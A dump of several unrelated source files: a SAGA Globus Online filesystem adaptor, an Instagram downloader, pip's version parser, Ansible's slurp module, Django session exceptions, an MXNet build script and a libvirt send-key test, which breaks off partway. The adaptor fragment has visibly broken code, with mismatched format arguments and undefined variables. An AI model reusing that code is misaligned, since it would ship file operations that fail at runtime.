# actual 'rename' command -- in all other cases (or if rename failed),
# we fake move as non-atomic copy/remove...
src_ps = self.get_path_spec (url=src_in)
tgt_ps = self.get_path_spec (url=tgt_in)
src_ep_str = src_ps.split (':', 1)[0]
tgt_ep_str = tgt_ps.split (':', 1)[0]
if src_ep_str == tgt_ep_str :
try :
self._adaptor.run_go_cmd (self.shell, "rename '%s' '%s'" % (src_ps, tgt_ps))
return
except :
self._logger.warn ("rename op failed -- retry as copy/remove")
# either the op spans endpoints, or the 'rename' op failed
self.copy (src_in, tgt_in, flags);
self.remove (src_in, flags);
# ----------------------------------------------------------------
#
@SYNC_CALL
def remove_self (self, flags):
self._is_valid ()
self.remove (self.url, flags)
self.invalid = True
# ----------------------------------------------------------------
#
@SYNC_CALL
def remove (self, tgt_in, flags):
self._is_valid ()
tgt_ps = self.get_path_spec (url=tgt_in)
cmd_flags = ""
if flags & saga.filesystem.RECURSIVE :
cmd_flags += "-r"
# oh this is just great... - a dir only gets removed (on some endpoints)
# if the trailing '/' is specified -- otherwise the op *silently fails*!
# Oh well, since we don't really (want to) know if the target is a dir
# or not, we remove both versions... :/
# FIXME
cmd = "rm %s -f '%s/'" % (cmd_flags, tgt_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd)
cmd = "rm %s -f '%s'" % (cmd_flags, tgt_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd, mode='ignore')
# ----------------------------------------------------------------
#
@SYNC_CALL
def make_dir (self, tgt_in, flags):
self._is_valid ()
tgt_ps = self.get_path_spec (url=tgt_in)
if flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, tgt_ps)
else :
cmd = "mkdir '%s'" % (cmd_flags, tgt_ps)
self._adaptor.run_go_cmd (self.shell, cmd)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def get_size_self (self) :
#
# self._is_valid ()
#
# return self.get_size (self.url)
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def get_size (self, tgt_in) :
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_dir_self (self):
#
# self._is_valid ()
#
# return self.is_dir (self.url)
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_dir (self, tgt_in):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_entry_self (self):
#
# self._is_valid ()
#
# return self.is_entry (self.url)
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_entry (self, tgt_in):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_link_self (self):
#
# self._is_valid ()
#
# return self.is_link (self.url)
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_link (self, tgt_in):
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_file_self (self):
#
# return self.is_entry_self ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_file (self, tgt_in):
#
# return self.is_entry (tgt_in)
#
#
###############################################################################
#
class GOFile (saga.adaptors.cpi.filesystem.File) :
""" Implements saga.adaptors.cpi.filesystem.File
"""
# ----------------------------------------------------------------
#
def __init__ (self, api, adaptor) :
_cpi_base = super (GOFile, self)
_cpi_base.__init__ (api, adaptor)
# ----------------------------------------------------------------
#
def _is_valid (self) :
if not self.valid :
raise saga.IncorrectState ("this instance was closed or removed")
# ----------------------------------------------------------------
#
@SYNC_CALL
def init_instance (self, adaptor_state, url, flags, session):
""" File instance constructor """
# FIXME: eval flags!
if flags == None :
flags = 0
self.orig = saga.Url (url) # deep copy
self.url = saga.Url (url) # deep copy
self.path = url.path # keep path separate
self.cwd = sumisc.url_get_dirname (self.url)
self.url.path = None
self.flags = flags
self.session = session
self.valid = False # will be set by initialize
self.initialize ()
return self.get_api ()
# ----------------------------------------------------------------
#
def initialize (self) :
# GO shell got started, found its prompt. Now, change
# to the initial (or later current) working directory.
self.shell = self._adaptor.get_go_shell (self.session)
self.ep = self._adaptor.get_go_endpoint (self.session, self.shell, self.url)
self.ep_str, self.ep_name, self.ep_url = \
self._adaptor.get_go_endpoint_ids (self.session, self.url)
ps = self.get_path_spec ()
cwd_ps = self.get_path_spec (path=self.cwd)
if not self.ep :
raise saga.badparameter ("invalid file '%s': %s" % (ps, out))
if self.flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, cwd_ps)
elif self.flags & saga.filesystem.CREATE :
self._logger.error ("CREATE not supported for files via globus online")
else :
# this is as good an existence test as we can manage...
self._adaptor.run_go_cmd (self.shell, "ls '%s'" % ps)
self._logger.debug ("initialized file %s/%s" % (self.url, self.path))
self.valid = True
# ----------------------------------------------------------------
#
def get_path_spec (self, url=None, path=None) :
return self._adaptor.get_path_spec (session = self.session,
url = url,
path = path,
cwd_url = self.url,
cwd_path = self.path)
# ----------------------------------------------------------------
#
def finalize (self, kill=False) :
if kill and self.shell :
self.shell.finalize (True)
self.shell = None
self.valid = False
# ----------------------------------------------------------------
#
@SYNC_CALL
def close (self, timeout=None):
if timeout :
raise saga.BadParameter ("timeout for close not supported")
self.finalize (kill=True)
# ----------------------------------------------------------------
#
@SYNC_CALL
def get_url (self):
self._is_valid ()
return saga.Url (self.orig) # deep copy
# ----------------------------------------------------------------
#
@SYNC_CALL
def copy_self (self, tgt_in, flags):
self._is_valid ()
# FIXME: eval flags
src_ps = self.get_path_spec ()
tgt_ps = self.get_path_spec (url=tgt_in)
if flags & saga.filesystem.CREATE_PARENTS :
self._adaptor.mkparents (self.session, self.shell, tgt_ps)
cmd = "scp %s -s 0 '%s' '%s'" % (cmd_flags, src_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd)
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def link_self (self, tgt_in, flags, _from_task=None):
#
# self._is_valid ()
#
#
# ----------------------------------------------------------------
#
@SYNC_CALL
def move_self (self, tgt_in, flags):
# if src and target are on the same endpoint, we might get away with an
# actual 'rename' command -- in all other cases (or if rename failed),
# we fake move as non-atomic copy/remove...
src_ps = self.get_path_spec ()
tgt_ps = self.get_path_spec (url=tgt_in)
src_ep_str = src_ps.split (':', 1)[0]
tgt_ep_str = tgt_ps.split (':', 1)[0]
if src_ep_str == tgt_ep_str :
try :
self._adaptor.run_go_cmd (self.shell, "rename '%s' '%s'" % (src_ps, tgt_ps))
return
except :
self._logger.warn ("rename op failed -- retry as copy/remove")
# either the op spans endpoints, or the 'rename' op failed
self.copy (src_in, tgt_in, flags);
self.remove (src_in, flags);
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
#
# self._is_valid ()
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def read (self,size=None):
#
# self._is_valid ()
#
#
# ----------------------------------------------------------------
#
@SYNC_CALL
def remove_self (self, flags):
self._is_valid ()
tgt_ps = self.get_path_spec ()
cmd = "rm %s -f '%s'" % (cmd_flags, tgt_ps, tgt_ps)
out, err = self._adaptor.run_go_cmd (self.shell, cmd, mode='ignore')
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def get_size_self (self) :
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_dir_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_entry_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_link_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
#
# # ----------------------------------------------------------------
# #
# @SYNC_CALL
# def is_file_self (self):
#
# self._is_valid ()
#
# # FIXME from ls -l
#
|
4pr0n/rip
|
refs/heads/master
|
sites/site_instagram.py
|
1
|
#!/usr/bin/python
from basesite import basesite
from json import loads
from time import sleep
from os import path
"""
Downloads instagram albums
"""
class instagram(basesite):
""" Retrieves API key from local file """
def get_api_key(self):
api_path = path.join(path.dirname(__file__), 'instagram_api.key')
api_key = ''
if path.exists(api_path):
f = open(api_path, 'r')
api_key = f.read().replace('\n', '').strip()
f.close()
if api_key == '':
raise Exception('no instagram API key found at %s' % api_path)
return api_key
""" Parse/strip URL to acceptable format """
def sanitize_url(self, url):
if'instagram.com/' in url:
# Legit
pass
elif 'web.stagram.com/n/' in url:
# Convert to web.stagram
user = url[url.find('.com/n/')+len('.com/n/'):]
if '/' in user: user = user[:user.find('/')]
url = 'http://instagram.com/%s' % user
else:
raise Exception('')
if '?' in url: url = url[:url.find('?')]
if '#' in url: url = url[:url.find('#')]
while url.endswith('/'): url = url[:-1]
return url
""" Discover directory path based on URL """
def get_dir(self, url):
user = url[url.rfind('/')+1:]
return 'instagram_%s' % user
def download(self):
self.init_dir()
client_id = self.get_api_key()
baseurl = '%s/media?client_id=%s' % (self.url, client_id)
url = baseurl
index = 0
while True:
self.debug('loading %s' % url)
r = self.web.get(url)
try: json = loads(r)
except:
self.wait_for_threads()
self.debug('invalid json response:\n%s' % r)
raise Exception('unable to parse json at %s' % url)
if not json['status'] == 'ok':
self.wait_for_threads()
self.log('status NOT OK: %s' % json['status'])
raise Exception('status not "ok": %s' % json['status'])
last_id = 0
for item in json['items']:
last_id = item['id']
for media_type in ['videos', 'images']:
if not media_type in item: continue
index += 1
media_url = item[media_type]['standard_resolution']['url']
self.download_image(media_url, index)
sleep(0.5)
break
if self.hit_image_limit(): break
if self.hit_image_limit(): break
if not json['more_available'] or last_id == 0: break
sleep(2)
url = '%s&max_id=%s' % (baseurl, last_id)
self.wait_for_threads()
|
abhikumar22/MYBLOG
|
refs/heads/master
|
blg/Lib/site-packages/pip/_vendor/packaging/version.py
|
1151
|
# This file is dual licensed under the terms of the Apache License, Version
# 2.0, and the BSD License. See the LICENSE file in the root of this repository
# for complete details.
from __future__ import absolute_import, division, print_function
import collections
import itertools
import re
from ._structures import Infinity
__all__ = [
"parse", "Version", "LegacyVersion", "InvalidVersion", "VERSION_PATTERN"
]
_Version = collections.namedtuple(
"_Version",
["epoch", "release", "dev", "pre", "post", "local"],
)
def parse(version):
"""
Parse the given version string and return either a :class:`Version` object
or a :class:`LegacyVersion` object depending on if the given version is
a valid PEP 440 version or a legacy version.
"""
try:
return Version(version)
except InvalidVersion:
return LegacyVersion(version)
class InvalidVersion(ValueError):
"""
An invalid version was found, users should refer to PEP 440.
"""
class _BaseVersion(object):
def __hash__(self):
return hash(self._key)
def __lt__(self, other):
return self._compare(other, lambda s, o: s < o)
def __le__(self, other):
return self._compare(other, lambda s, o: s <= o)
def __eq__(self, other):
return self._compare(other, lambda s, o: s == o)
def __ge__(self, other):
return self._compare(other, lambda s, o: s >= o)
def __gt__(self, other):
return self._compare(other, lambda s, o: s > o)
def __ne__(self, other):
return self._compare(other, lambda s, o: s != o)
def _compare(self, other, method):
if not isinstance(other, _BaseVersion):
return NotImplemented
return method(self._key, other._key)
class LegacyVersion(_BaseVersion):
def __init__(self, version):
self._version = str(version)
self._key = _legacy_cmpkey(self._version)
def __str__(self):
return self._version
def __repr__(self):
return "<LegacyVersion({0})>".format(repr(str(self)))
@property
def public(self):
return self._version
@property
def base_version(self):
return self._version
@property
def local(self):
return None
@property
def is_prerelease(self):
return False
@property
def is_postrelease(self):
return False
_legacy_version_component_re = re.compile(
r"(\d+ | [a-z]+ | \.| -)", re.VERBOSE,
)
_legacy_version_replacement_map = {
"pre": "c", "preview": "c", "-": "final-", "rc": "c", "dev": "@",
}
def _parse_version_parts(s):
for part in _legacy_version_component_re.split(s):
part = _legacy_version_replacement_map.get(part, part)
if not part or part == ".":
continue
if part[:1] in "0123456789":
# pad for numeric comparison
yield part.zfill(8)
else:
yield "*" + part
# ensure that alpha/beta/candidate are before final
yield "*final"
def _legacy_cmpkey(version):
# We hardcode an epoch of -1 here. A PEP 440 version can only have a epoch
# greater than or equal to 0. This will effectively put the LegacyVersion,
# which uses the defacto standard originally implemented by setuptools,
# as before all PEP 440 versions.
epoch = -1
# This scheme is taken from pkg_resources.parse_version setuptools prior to
# it's adoption of the packaging library.
parts = []
for part in _parse_version_parts(version.lower()):
if part.startswith("*"):
# remove "-" before a prerelease tag
if part < "*final":
while parts and parts[-1] == "*final-":
parts.pop()
# remove trailing zeros from each series of numeric parts
while parts and parts[-1] == "00000000":
parts.pop()
parts.append(part)
parts = tuple(parts)
return epoch, parts
# Deliberately not anchored to the start and end of the string, to make it
# easier for 3rd party code to reuse
VERSION_PATTERN = r"""
v?
(?:
(?:(?P<epoch>[0-9]+)!)? # epoch
(?P<release>[0-9]+(?:\.[0-9]+)*) # release segment
(?P<pre> # pre-release
[-_\.]?
(?P<pre_l>(a|b|c|rc|alpha|beta|pre|preview))
[-_\.]?
(?P<pre_n>[0-9]+)?
)?
(?P<post> # post release
(?:-(?P<post_n1>[0-9]+))
|
(?:
[-_\.]?
(?P<post_l>post|rev|r)
[-_\.]?
(?P<post_n2>[0-9]+)?
)
)?
(?P<dev> # dev release
[-_\.]?
(?P<dev_l>dev)
[-_\.]?
(?P<dev_n>[0-9]+)?
)?
)
(?:\+(?P<local>[a-z0-9]+(?:[-_\.][a-z0-9]+)*))? # local version
"""
class Version(_BaseVersion):
_regex = re.compile(
r"^\s*" + VERSION_PATTERN + r"\s*$",
re.VERBOSE | re.IGNORECASE,
)
def __init__(self, version):
# Validate the version and parse it into pieces
match = self._regex.search(version)
if not match:
raise InvalidVersion("Invalid version: '{0}'".format(version))
# Store the parsed out pieces of the version
self._version = _Version(
epoch=int(match.group("epoch")) if match.group("epoch") else 0,
release=tuple(int(i) for i in match.group("release").split(".")),
pre=_parse_letter_version(
match.group("pre_l"),
match.group("pre_n"),
),
post=_parse_letter_version(
match.group("post_l"),
match.group("post_n1") or match.group("post_n2"),
),
dev=_parse_letter_version(
match.group("dev_l"),
match.group("dev_n"),
),
local=_parse_local_version(match.group("local")),
)
# Generate a key which will be used for sorting
self._key = _cmpkey(
self._version.epoch,
self._version.release,
self._version.pre,
self._version.post,
self._version.dev,
self._version.local,
)
def __repr__(self):
return "<Version({0})>".format(repr(str(self)))
def __str__(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{0}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
# Pre-release
if self._version.pre is not None:
parts.append("".join(str(x) for x in self._version.pre))
# Post-release
if self._version.post is not None:
parts.append(".post{0}".format(self._version.post[1]))
# Development release
if self._version.dev is not None:
parts.append(".dev{0}".format(self._version.dev[1]))
# Local version segment
if self._version.local is not None:
parts.append(
"+{0}".format(".".join(str(x) for x in self._version.local))
)
return "".join(parts)
@property
def public(self):
return str(self).split("+", 1)[0]
@property
def base_version(self):
parts = []
# Epoch
if self._version.epoch != 0:
parts.append("{0}!".format(self._version.epoch))
# Release segment
parts.append(".".join(str(x) for x in self._version.release))
return "".join(parts)
@property
def local(self):
version_string = str(self)
if "+" in version_string:
return version_string.split("+", 1)[1]
@property
def is_prerelease(self):
return bool(self._version.dev or self._version.pre)
@property
def is_postrelease(self):
return bool(self._version.post)
def _parse_letter_version(letter, number):
if letter:
# We consider there to be an implicit 0 in a pre-release if there is
# not a numeral associated with it.
if number is None:
number = 0
# We normalize any letters to their lower case form
letter = letter.lower()
# We consider some words to be alternate spellings of other words and
# in those cases we want to normalize the spellings to our preferred
# spelling.
if letter == "alpha":
letter = "a"
elif letter == "beta":
letter = "b"
elif letter in ["c", "pre", "preview"]:
letter = "rc"
elif letter in ["rev", "r"]:
letter = "post"
return letter, int(number)
if not letter and number:
# We assume if we are given a number, but we are not given a letter
# then this is using the implicit post release syntax (e.g. 1.0-1)
letter = "post"
return letter, int(number)
_local_version_seperators = re.compile(r"[\._-]")
def _parse_local_version(local):
"""
Takes a string like abc.1.twelve and turns it into ("abc", 1, "twelve").
"""
if local is not None:
return tuple(
part.lower() if not part.isdigit() else int(part)
for part in _local_version_seperators.split(local)
)
def _cmpkey(epoch, release, pre, post, dev, local):
# When we compare a release version, we want to compare it with all of the
# trailing zeros removed. So we'll use a reverse the list, drop all the now
# leading zeros until we come to something non zero, then take the rest
# re-reverse it back into the correct order and make it a tuple and use
# that for our sorting key.
release = tuple(
reversed(list(
itertools.dropwhile(
lambda x: x == 0,
reversed(release),
)
))
)
# We need to "trick" the sorting algorithm to put 1.0.dev0 before 1.0a0.
# We'll do this by abusing the pre segment, but we _only_ want to do this
# if there is not a pre or a post segment. If we have one of those then
# the normal sorting rules will handle this case correctly.
if pre is None and post is None and dev is not None:
pre = -Infinity
# Versions without a pre-release (except as noted above) should sort after
# those with one.
elif pre is None:
pre = Infinity
# Versions without a post segment should sort before those with one.
if post is None:
post = -Infinity
# Versions without a development segment should sort after those with one.
if dev is None:
dev = Infinity
if local is None:
# Versions without a local segment should sort before those with one.
local = -Infinity
else:
# Versions with a local segment need that segment parsed to implement
# the sorting rules in PEP440.
# - Alpha numeric segments sort before numeric segments
# - Alpha numeric segments sort lexicographically
# - Numeric segments sort numerically
# - Shorter versions sort before longer versions when the prefixes
# match exactly
local = tuple(
(i, "") if isinstance(i, int) else (-Infinity, i)
for i in local
)
return epoch, release, pre, post, dev, local
|
ilya-epifanov/ansible-modules-core
|
refs/heads/devel
|
network/basics/slurp.py
|
134
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Michael DeHaan <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: slurp
version_added: historical
short_description: Slurps a file from remote nodes
description:
- This module works like M(fetch). It is used for fetching a base64-
encoded blob containing the data in a remote file.
options:
src:
description:
- The file on the remote system to fetch. This I(must) be a file, not a
directory.
required: true
default: null
aliases: []
notes:
- "See also: M(fetch)"
requirements: []
author:
- "Ansible Core Team"
- "Michael DeHaan"
'''
EXAMPLES = '''
ansible host -m slurp -a 'src=/tmp/xx'
host | success >> {
"content": "aGVsbG8gQW5zaWJsZSB3b3JsZAo=",
"encoding": "base64"
}
'''
import base64
def main():
module = AnsibleModule(
argument_spec = dict(
src = dict(required=True, aliases=['path']),
),
supports_check_mode=True
)
source = os.path.expanduser(module.params['src'])
if not os.path.exists(source):
module.fail_json(msg="file not found: %s" % source)
if not os.access(source, os.R_OK):
module.fail_json(msg="file is not readable: %s" % source)
data = base64.b64encode(file(source).read())
module.exit_json(content=data, source=source, encoding='base64')
# import module snippets
from ansible.module_utils.basic import *
main()
|
rooshilp/CMPUT410Lab6
|
refs/heads/master
|
virt_env/virt1/lib/python2.7/site-packages/django/contrib/sessions/exceptions.py
|
931
|
from django.core.exceptions import SuspiciousOperation
class InvalidSessionKey(SuspiciousOperation):
"""Invalid characters in session key"""
pass
class SuspiciousSession(SuspiciousOperation):
"""The session may be tampered with"""
pass
|
ptrendx/mxnet
|
refs/heads/master
|
ci/build_windows.py
|
1
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""User friendly / multi platform builder script"""
import argparse
import datetime
import glob
import logging
import os
import platform
import shutil
import sys
import time
from distutils.dir_util import copy_tree
from enum import Enum
from subprocess import check_call
from util import *
KNOWN_VCVARS = {
'VS 2015': r'C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\bin\x86_amd64\vcvarsx86_amd64.bat',
'VS 2017': r'C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\VC\Auxiliary\Build\vcvarsx86_amd64.bat'
}
class BuildFlavour(Enum):
WIN_CPU = 'WIN_CPU'
WIN_CPU_MKLDNN = 'WIN_CPU_MKLDNN'
WIN_GPU = 'WIN_GPU'
WIN_GPU_MKLDNN = 'WIN_GPU_MKLDNN'
CMAKE_FLAGS = {
'WIN_CPU': ('-DUSE_CUDA=0 '
'-DUSE_CUDNN=0 '
'-DUSE_NVRTC=0 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DBUILD_CPP_EXAMPLES=1 '
'-DUSE_MKL_IF_AVAILABLE=0 '
'-DCMAKE_BUILD_TYPE=Release')
, 'WIN_CPU_MKLDNN': ('-DUSE_CUDA=0 '
'-DUSE_CUDNN=0 '
'-DUSE_NVRTC=0 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DUSE_MKL_IF_AVAILABLE=1 '
'-DCMAKE_BUILD_TYPE=Release')
, 'WIN_GPU': ('-DUSE_CUDA=1 '
'-DUSE_CUDNN=1 '
'-DUSE_NVRTC=1 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DCUDA_ARCH_NAME=Manual '
'-DCUDA_ARCH_BIN=52 '
'-DCUDA_ARCH_PTX=52 '
'-DCMAKE_CXX_FLAGS="/FS /MD /O2 /Ob2" '
'-DUSE_MKL_IF_AVAILABLE=0 '
'-DCMAKE_BUILD_TYPE=Release')
, 'WIN_GPU_MKLDNN': ('-DUSE_CUDA=1 '
'-DUSE_CUDNN=1 '
'-DUSE_NVRTC=1 '
'-DUSE_OPENCV=1 '
'-DUSE_OPENMP=1 '
'-DUSE_PROFILER=1 '
'-DUSE_BLAS=open '
'-DUSE_LAPACK=1 '
'-DUSE_DIST_KVSTORE=0 '
'-DCUDA_ARCH_NAME=Manual '
'-DCUDA_ARCH_BIN=52 '
'-DCUDA_ARCH_PTX=52 '
'-DUSE_MKLDNN=1 '
'-DCMAKE_CXX_FLAGS="/FS /MD /O2 /Ob2" '
'-DCMAKE_BUILD_TYPE=Release')
}
def windows_build(args):
logging.info("Using vcvars environment:\n{}".format(args.vcvars))
path = args.output
os.makedirs(path, exist_ok=True)
mxnet_root = get_mxnet_root()
logging.info("Found MXNet root: {}".format(mxnet_root))
with remember_cwd():
os.chdir(path)
cmd = "\"{}\" && cmake -G \"NMake Makefiles JOM\" {} {}".format(args.vcvars,
CMAKE_FLAGS[args.flavour],
mxnet_root)
logging.info("Generating project with CMake:\n{}".format(cmd))
check_call(cmd, shell=True)
cmd = "\"{}\" && jom".format(args.vcvars)
logging.info("Building with jom:\n{}".format(cmd))
t0 = int(time.time())
check_call(cmd, shell=True)
logging.info("Build flavour: {} complete in directory: \"{}\"".format(args.flavour, os.path.abspath(path)))
logging.info("Build took {}".format(datetime.timedelta(seconds=int(time.time() - t0))))
windows_package(args)
def windows_package(args):
pkgfile = 'windows_package.7z'
pkgdir = os.path.abspath('windows_package')
logging.info("Packaging libraries and headers in package: %s", pkgfile)
j = os.path.join
pkgdir_lib = os.path.abspath(j(pkgdir, 'lib'))
with remember_cwd():
os.chdir(args.output)
logging.info("Looking for static libraries and dlls in: \"%s", os.getcwd())
libs = list(glob.iglob('**/*.lib', recursive=True))
dlls = list(glob.iglob('**/*.dll', recursive=True))
os.makedirs(pkgdir_lib, exist_ok=True)
for lib in libs:
logging.info("packing lib: %s", lib)
shutil.copy(lib, pkgdir_lib)
for dll in dlls:
logging.info("packing dll: %s", dll)
shutil.copy(dll, pkgdir_lib)
os.chdir(get_mxnet_root())
logging.info('packing python bindings')
copy_tree('python', j(pkgdir, 'python'))
logging.info('packing headers')
copy_tree('include', j(pkgdir, 'include'))
logging.info("Compressing package: %s", pkgfile)
check_call(['7z', 'a', pkgfile, pkgdir])
def nix_build(args):
path = args.output
os.makedirs(path, exist_ok=True)
with remember_cwd():
os.chdir(path)
logging.info("Generating project with CMake")
check_call("cmake \
-DUSE_CUDA=OFF \
-DUSE_OPENCV=OFF \
-DUSE_OPENMP=OFF \
-DCMAKE_BUILD_TYPE=Debug \
-GNinja ..", shell=True)
check_call("ninja", shell=True)
def main():
logging.getLogger().setLevel(logging.INFO)
logging.basicConfig(format='%(asctime)-15s %(message)s')
logging.info("MXNet Windows build helper")
parser = argparse.ArgumentParser()
parser.add_argument("-o", "--output",
help="output directory",
default='build',
type=str)
parser.add_argument("--vcvars",
help="vcvars batch file location, typically inside vs studio install dir",
default=KNOWN_VCVARS['VS 2015'],
type=str)
parser.add_argument("--arch",
help="architecture",
default='x64',
type=str)
parser.add_argument("-f", "--flavour",
help="build flavour",
default='WIN_CPU',
choices=[x.name for x in BuildFlavour],
type=str)
args = parser.parse_args()
logging.info("Build flavour: %s", args.flavour)
system = platform.system()
if system == 'Windows':
logging.info("Detected Windows platform")
if 'OpenBLAS_HOME' not in os.environ:
os.environ["OpenBLAS_HOME"] = "C:\\mxnet\\openblas"
if 'OpenCV_DIR' not in os.environ:
os.environ["OpenCV_DIR"] = "C:\\mxnet\\opencv_vc14"
if 'CUDA_PATH' not in os.environ:
os.environ["CUDA_PATH"] = "C:\\CUDA\\v8.0"
windows_build(args)
elif system == 'Linux' or system == 'Darwin':
nix_build(args)
else:
logging.error("Don't know how to build for {} yet".format(platform.system()))
return 0
if __name__ == '__main__':
sys.exit(main())
|
liuzzfnst/tp-libvirt
|
refs/heads/master
|
libvirt/tests/src/virsh_cmd/domain/virsh_sendkey.py
|
3
|
import logging
import time
from autotest.client.shared import error
from virttest import virsh
from provider import libvirt_version
def run(test, params, env):
"""
Test send-key command, include all types of codeset and sysrq
For normal sendkey test, we create a file to check the command
execute by send-key. For sysrq test, check the /var/log/messages
and guest status
"""
if not virsh.has_help_command('send-key'):
raise error.TestNAError("This version of libvirt does not support "
"the send-key test")
vm_name = params.get("main_vm", "virt-tests-vm1")
status_error = ("yes" == params.get("status_error", "no"))
options = params.get("sendkey_options", "")
sysrq_test = ("yes" == params.get("sendkey_sysrq", "no"))
sleep_time = int(params.get("sendkey_sleeptime", 2))
readonly = params.get("readonly", False)
username = params.get("username")
password = params.get("password")
create_file = params.get("create_file_name")
uri = params.get("virsh_uri")
unprivileged_user = params.get('unprivileged_user')
if unprivileged_user:
if unprivileged_user.count('EXAMPLE'):
unprivileged_user = 'testacl'
if not libvirt_version.version_compare(1, 1, 1):
if params.get('setup_libvirt_polkit') == 'yes':
raise error.TestNAError("API acl test not supported in current"
" libvirt version.")
def send_line(send_str):
"""
send string to guest with send-key and end with Enter
"""
for send_ch in list(send_str):
virsh.sendkey(vm_name, "KEY_%s" % send_ch.upper(),
ignore_status=False)
virsh.sendkey(vm_name, "KEY_ENTER",
ignore_status=False)
vm = env.get_vm(vm_name)
session = vm.wait_for_login()
if sysrq_test:
# Is 'rsyslog' installed on guest? It'll be what writes out
# to /var/log/messages
rpm_stat = session.cmd_status("rpm -q rsyslog")
if rpm_stat != 0:
logging.debug("rsyslog not found in guest installing")
stat_install = session.cmd_status("yum install -y rsyslog", 300)
if stat_install != 0:
raise error.TestFail("Fail to install rsyslog, make"
"sure that you have usable repo in guest")
# clear messages, restart rsyslog, and make sure it's running
session.cmd("echo '' > /var/log/messages")
session.cmd("service rsyslog restart")
ps_stat = session.cmd_status("ps aux |grep rsyslog")
if ps_stat != 0:
raise error.TestFail("rsyslog is not running in guest")
# enable sysrq
session.cmd("echo 1 > /proc/sys/kernel/sysrq")
# make sure the environment is clear
if create_file is not None:
session.cmd("rm -rf %s" % create_file)
try:
# wait for tty1 started
tty1_stat = "ps aux|grep tty[1]"
timeout = 60
while timeout >= 0 and \
session.get_command_status(tty1_stat) != 0:
time.sleep(1)
timeout = timeout - 1
if timeout < 0:
raise error.TestFail("Can not wait for tty1 started in 60s")
# send user and passwd to guest to login
send_line(username)
time.sleep(2)
send_line(password)
time.sleep(2)
output = virsh.sendkey(vm_name, options, readonly=readonly,
unprivileged_user=unprivileged_user,
uri=uri)
time.sleep(sleep_time)
if output.exit_status != 0:
if status_error:
logging.info("Failed to sendkey to guest as expected, Error:"
"%s.", output.stderr)
return
else:
raise error.TestFail("Failed to send key to guest, Error:%s." %
output.stderr)
elif status_error:
raise error.TestFail("Expect fail, but succeed indeed.")
if create_file is not None:
# check if created file exist
cmd_ls = "ls %s" % create_file
sec_status, sec_output = session.get_command_status_output(cmd_ls)
if sec_status == 0:
logging.info("Succeed to create file with send key")
else:
raise error.TestFail("Fail to create file with send key, "
"Error:%s" % sec_output)
elif sysrq_test:
# check /var/log/message info according to different key
# Since there's no guarantee when messages will be written
# we'll do a check and wait loop for up to 60 seconds
timeout = 60
while timeout >= 0:
if "KEY_H" in options:
get_status = session.cmd_status("cat /var/log/messages|"
"grep 'SysRq.*HELP'")
elif "KEY_M" in options:
get_status = session.cmd_status("cat /var/log/messages|"
"grep 'SysRq.*Show Memory'")
elif "KEY_T" in options:
get_status = session.cmd_status("cat /var/log/messages|"
